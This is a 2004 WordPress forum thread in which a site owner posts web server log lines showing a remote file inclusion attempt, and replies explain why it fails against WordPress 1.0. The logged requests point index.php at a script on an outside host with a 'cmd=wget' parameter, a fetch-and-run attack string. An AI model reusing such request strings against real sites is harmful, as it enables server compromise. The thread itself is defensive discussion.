WordPress exploit attempt

  • jarrod

    (@jarrod)


    22 years, 3 months ago

    Hey everyone,
    Just wanted to ask if anyone else has had issues with exploit attempts on their WordPress installation? I’m dealing with my host right now regarding the following attempts on an installation of 1.0 on my site:

    Scripts disabled: Reason, exploited.
    203.130.255.247 – – [18/Feb/2004:10:05:38 -0500] “GET /green/index.php?p=http://www.campoeng.org/x.txt?&cmd=wget HTTP/1.0” 200 13557 “-” “Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)”
    203.130.255.247 – – [18/Feb/2004:10:05:40 -0500] “GET /print.css HTTP/1.0” 200 447 “http://textbased.com/green/index.php?p=http://www.campoeng.org/x.txt?&cmd=wget” “Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)”
    203.130.255.247 – – [18/Feb/2004:10:05:40 -0500] “GET /wp-layout.css HTTP/1.0” 200 2206 “http://textbased.com/green/index.php?p=http://www.campoeng.org/x.txt?&cmd=wget” “Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)”
    203.130.255.247 – – [18/Feb/2004:10:05:46 -0500] “GET /masthead.png HTTP/1.0” 200 2779 “http://textbased.com/green/index.php?p=http://www.campoeng.org/x.txt?&cmd=wget” “Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)”

    I seriously doubt they were successful as it’s taken them 4 days to notice, but still, if anyone else has had this problem or knows if WordPress is exploitable, I would greatly appreciate knowing. That IP address and host have since been blocked on my account, and hopefully this will prevent others from running into the same issue.

Viewing 4 replies - 1 through 4 (of 4 total)
  • Moderator Matt Mullenweg

    (@matt)

    22 years, 3 months ago

    Strange, setting $p to that would do absolutely nothing I can tell. There are no outstanding exploits in the 1.0 series. Thanks for sharing this though. I’ll keep my eye out for anything suspicious.

    kashirow

    (@kashirow)

    22 years, 3 months ago

    The way it looks from studying the files referenced, they were hoping that WordPress can actually suck up and execute a file from some other server by having that file’s url fed to it in the post ID field.
    Since the first thing that WordPress does with this variable is “$p = intval($p);”, this most definitely won’t work. Although if such a weakness was found in WordPress, this x.txt script could be used to exploit it.

    Thread Starter jarrod

    (@jarrod)

    22 years, 3 months ago

    Thanks for the reassurance allusion, it’s greatly appreciated. I think they may have been a little TOO cautious, to my knowledge you can’t upload anything with a PNG image or CSS file, but that’s just me 😉
    I was concerned about the index.php file though, especially since I had uploads enabled. I didn’t think it was possible to do through the index.php file, but still, better to be safe than sorry, I suppose.
    At the very least, the IP and host are available for others to block, I’d hate for an exploit to be found in WP, I can’t imagine using anything else to manage my blogs.

    philor

    (@philor)

    22 years, 3 months ago

    I would guess that it’s not an attempt on WordPress so much as an attempt on whatever they find by searching for “?p=” (one way or another: I couldn’t find a syntax that would work at Google, but there probably is one).
    Most hosts like to disable first, and let you ask questions later. I had my honeypot FormMail.cgi shut down for being “a vulnerable version of Matt’s FormMail” once. It’s only if they don’t re-enable it while apologizing for the inconvenience that you might start thinking about a new host. (Or if they take four days before they notice what they claim is an exploit.)
    Actually a cute little exploit, though I wonder why they would risk failure whenever short_open_tags is off in php.ini when they could avoid it with just three more characters. Sloppy.

Viewing 4 replies - 1 through 4 (of 4 total)

The topic ‘WordPress exploit attempt’ is closed to new replies.